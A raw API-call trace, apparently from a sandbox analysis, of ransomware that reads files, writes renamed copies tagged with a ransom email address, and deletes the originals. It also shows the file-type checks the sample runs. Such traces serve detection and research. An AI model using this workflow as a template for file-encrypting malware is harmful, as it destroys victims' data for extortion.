[0047.600] lstrlenW (lpString=".rar") returned 4 [0047.600] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0047.600] lstrlenW (lpString=".bz2") returned 4 [0047.600] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0047.600] lstrlenW (lpString=".7z") returned 3 [0047.600] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0047.601] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0047.601] lstrlenW (lpString=".dbf") returned 4 [0047.601] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0047.601] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0047.601] lstrlenW (lpString=".1cd") returned 4 [0047.601] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0047.601] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0047.601] lstrlenW (lpString=".jpg") returned 4 [0047.601] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0047.601] lstrcmpiW (lpString1=".ico", lpString2=".bat") returned 1 [0047.601] lstrlenW (lpString="Rotate5.ico") returned 11 [0047.601] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.601] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=894) returned 1 [0047.601] CloseHandle (hObject=0x2e0) returned 1 [0047.602] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico")) returned 0x80 [0047.602] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.602] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.602] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.602] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.602] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0047.602] GetLastError () returned 0x0 [0047.602] ReadFile (in: hFile=0x2e0, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x37e, lpOverlapped=0x0) returned 1 [0047.604] WriteFile (in: hFile=0x2c0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x380, lpOverlapped=0x0) returned 1 [0047.605] ReadFile (in: hFile=0x2e0, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.605] WriteFile (in: hFile=0x2c0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xea, lpOverlapped=0x0) returned 1 [0047.605] SetEndOfFile (hFile=0x2c0) returned 1 [0047.606] CloseHandle (hObject=0x2c0) returned 1 [0047.606] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.606] SetEndOfFile (hFile=0x2e0) returned 1 [0047.607] CloseHandle (hObject=0x2e0) returned 1 [0047.607] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.618] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico")) returned 1 [0047.618] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0047.618] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0047.618] lstrlenW (lpString=".doc") returned 4 [0047.618] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0047.618] lstrlenW (lpString=".docx") returned 5 [0047.618] lstrcmpiW (lpString1=".docx", lpString2="5.ico") returned -1 [0047.618] lstrlenW (lpString=".pdf") returned 4 [0047.618] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0047.618] lstrlenW (lpString=".xls") returned 4 [0047.619] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0047.619] lstrlenW (lpString=".xlsx") returned 5 [0047.619] lstrcmpiW (lpString1=".xlsx", lpString2="5.ico") returned -1 [0047.619] lstrlenW (lpString=".ppt") returned 4 [0047.619] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0047.619] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0047.619] lstrlenW (lpString=".zip") returned 4 [0047.619] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0047.619] lstrlenW (lpString=".rar") returned 4 [0047.619] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0047.619] lstrlenW (lpString=".bz2") returned 4 [0047.619] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0047.619] lstrlenW (lpString=".7z") returned 3 [0047.619] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0047.619] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0047.619] lstrlenW (lpString=".dbf") returned 4 [0047.619] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0047.619] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0047.619] lstrlenW (lpString=".1cd") returned 4 [0047.619] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0047.619] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0047.619] lstrlenW (lpString=".jpg") returned 4 [0047.619] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0047.619] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0047.619] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0047.619] lstrlenW (lpString=".doc") returned 4 [0047.619] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0047.619] lstrlenW (lpString=".docx") returned 5 [0047.619] lstrcmpiW (lpString1=".docx", lpString2="5.ico") returned -1 [0047.619] lstrlenW (lpString=".pdf") returned 4 [0047.619] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0047.619] lstrlenW (lpString=".xls") returned 4 [0047.619] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0047.620] lstrlenW (lpString=".xlsx") returned 5 [0047.620] lstrcmpiW (lpString1=".xlsx", lpString2="5.ico") returned -1 [0047.620] lstrlenW (lpString=".ppt") returned 4 [0047.620] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0047.620] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0047.620] lstrlenW (lpString=".zip") returned 4 [0047.620] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0047.620] lstrlenW (lpString=".rar") returned 4 [0047.620] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0047.620] lstrlenW (lpString=".bz2") returned 4 [0047.620] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0047.620] lstrlenW (lpString=".7z") returned 3 [0047.620] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0047.620] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0047.620] lstrlenW (lpString=".dbf") returned 4 [0047.620] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0047.620] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0047.620] lstrlenW (lpString=".1cd") returned 4 [0047.620] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0047.620] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0047.620] lstrlenW (lpString=".jpg") returned 4 [0047.620] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0047.620] lstrcmpiW (lpString1=".ico", lpString2=".bat") returned 1 [0047.620] lstrlenW (lpString="Rotate6.ico") returned 11 [0047.620] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.620] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=894) returned 1 [0047.621] CloseHandle (hObject=0x2cc) returned 1 [0047.621] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico")) returned 0x80 [0047.621] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.621] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.621] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.621] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.621] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.621] GetLastError () returned 0x0 [0047.621] ReadFile (in: hFile=0x2cc, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x37e, lpOverlapped=0x0) returned 1 [0047.631] WriteFile (in: hFile=0x2c4, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x380, lpOverlapped=0x0) returned 1 [0047.632] ReadFile (in: hFile=0x2cc, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.632] WriteFile (in: hFile=0x2c4, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xea, lpOverlapped=0x0) returned 1 [0047.632] SetEndOfFile (hFile=0x2c4) returned 1 [0047.632] CloseHandle (hObject=0x2c4) returned 1 [0047.633] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.633] SetEndOfFile (hFile=0x2cc) returned 1 [0047.633] CloseHandle (hObject=0x2cc) returned 1 [0047.633] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.634] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico")) returned 1 [0047.634] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0047.634] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0047.634] lstrlenW (lpString=".doc") returned 4 [0047.634] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0047.634] lstrlenW (lpString=".docx") returned 5 [0047.634] lstrcmpiW (lpString1=".docx", lpString2="6.ico") returned -1 [0047.634] lstrlenW (lpString=".pdf") returned 4 [0047.634] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0047.634] lstrlenW (lpString=".xls") returned 4 [0047.634] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0047.634] lstrlenW (lpString=".xlsx") returned 5 [0047.634] lstrcmpiW (lpString1=".xlsx", lpString2="6.ico") returned -1 [0047.634] lstrlenW (lpString=".ppt") returned 4 [0047.634] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0047.634] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0047.634] lstrlenW (lpString=".zip") returned 4 [0047.634] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0047.634] lstrlenW (lpString=".rar") returned 4 [0047.634] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0047.634] lstrlenW (lpString=".bz2") returned 4 [0047.634] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0047.634] lstrlenW (lpString=".7z") returned 3 [0047.635] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0047.635] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0047.635] lstrlenW (lpString=".dbf") returned 4 [0047.635] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0047.635] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0047.635] lstrlenW (lpString=".1cd") returned 4 [0047.635] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0047.635] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0047.635] lstrlenW (lpString=".jpg") returned 4 [0047.635] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0047.635] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0047.635] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0047.635] lstrlenW (lpString=".doc") returned 4 [0047.635] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0047.635] lstrlenW (lpString=".docx") returned 5 [0047.635] lstrcmpiW (lpString1=".docx", lpString2="6.ico") returned -1 [0047.635] lstrlenW (lpString=".pdf") returned 4 [0047.635] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0047.931] lstrlenW (lpString=".xls") returned 4 [0047.931] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0047.931] lstrlenW (lpString=".xlsx") returned 5 [0047.931] lstrcmpiW (lpString1=".xlsx", lpString2="6.ico") returned -1 [0047.931] lstrlenW (lpString=".ppt") returned 4 [0047.931] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0047.931] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0047.931] lstrlenW (lpString=".zip") returned 4 [0047.931] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0047.931] lstrlenW (lpString=".rar") returned 4 [0047.931] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0047.931] lstrlenW (lpString=".bz2") returned 4 [0047.931] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0047.931] lstrlenW (lpString=".7z") returned 3 [0047.931] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0047.931] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0047.931] lstrlenW (lpString=".dbf") returned 4 [0047.931] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0047.931] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0047.931] lstrlenW (lpString=".1cd") returned 4 [0047.931] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0047.931] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 42 [0047.931] lstrlenW (lpString=".jpg") returned 4 [0047.931] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0047.932] lstrcmpiW (lpString1=".ico", lpString2=".bat") returned 1 [0047.932] lstrlenW (lpString="SysReqMet.ico") returned 13 [0047.932] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0048.151] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=1150) returned 1 [0048.151] CloseHandle (hObject=0x338) returned 1 [0048.151] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico")) returned 0x80 [0048.152] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0048.152] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0048.152] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0048.152] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0048.152] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0048.152] GetLastError () returned 0x0 [0048.152] ReadFile (in: hFile=0x338, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x47e, lpOverlapped=0x0) returned 1 [0048.163] WriteFile (in: hFile=0x33c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x480, lpOverlapped=0x0) returned 1 [0048.164] ReadFile (in: hFile=0x338, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0048.164] WriteFile (in: hFile=0x33c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xee, lpOverlapped=0x0) returned 1 [0048.164] SetEndOfFile (hFile=0x33c) returned 1 [0048.164] CloseHandle (hObject=0x33c) returned 1 [0048.165] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0048.165] SetEndOfFile (hFile=0x338) returned 1 [0048.166] CloseHandle (hObject=0x338) returned 1 [0048.166] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0048.166] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico")) returned 1 [0048.167] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0048.167] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0048.167] lstrlenW (lpString=".doc") returned 4 [0048.167] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0048.167] lstrlenW (lpString=".docx") returned 5 [0048.167] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1 [0048.167] lstrlenW (lpString=".pdf") returned 4 [0048.167] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0048.167] lstrlenW (lpString=".xls") returned 4 [0048.167] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0048.167] lstrlenW (lpString=".xlsx") returned 5 [0048.167] lstrcmpiW (lpString1=".xlsx", lpString2="t.ico") returned -1 [0048.167] lstrlenW (lpString=".ppt") returned 4 [0048.167] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0048.167] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0048.167] lstrlenW (lpString=".zip") returned 4 [0048.167] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0048.167] lstrlenW (lpString=".rar") returned 4 [0048.167] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0048.167] lstrlenW (lpString=".bz2") returned 4 [0048.167] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0048.167] lstrlenW (lpString=".7z") returned 3 [0048.167] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0048.167] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0048.167] lstrlenW (lpString=".dbf") returned 4 [0048.167] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0048.167] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0048.167] lstrlenW (lpString=".1cd") returned 4 [0048.167] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0048.167] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0048.167] lstrlenW (lpString=".jpg") returned 4 [0048.167] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0048.168] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0048.168] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0048.168] lstrlenW (lpString=".doc") returned 4 [0048.168] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0048.168] lstrlenW (lpString=".docx") returned 5 [0048.168] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1 [0048.168] lstrlenW (lpString=".pdf") returned 4 [0048.168] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0048.168] lstrlenW (lpString=".xls") returned 4 [0048.168] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0048.168] lstrlenW (lpString=".xlsx") returned 5 [0048.168] lstrcmpiW (lpString1=".xlsx", lpString2="t.ico") returned -1 [0048.168] lstrlenW (lpString=".ppt") returned 4 [0048.168] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0048.168] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0048.168] lstrlenW (lpString=".zip") returned 4 [0048.168] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0048.168] lstrlenW (lpString=".rar") returned 4 [0048.168] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0048.168] lstrlenW (lpString=".bz2") returned 4 [0048.168] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0048.168] lstrlenW (lpString=".7z") returned 3 [0048.168] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0048.168] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0048.168] lstrlenW (lpString=".dbf") returned 4 [0048.168] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0048.168] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0048.168] lstrlenW (lpString=".1cd") returned 4 [0048.168] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0048.168] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0048.168] lstrlenW (lpString=".jpg") returned 4 [0048.168] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0048.169] lstrcmpiW (lpString1=".msi", lpString2=".bat") returned 1 [0048.169] lstrlenW (lpString="netfx_Core_x64.msi") returned 18 [0048.169] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0048.172] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=1901056) returned 1 [0048.172] CloseHandle (hObject=0x328) returned 1 [0048.172] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi")) returned 0x80 [0048.172] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0048.172] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), lpNewFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0048.172] CreateFileW 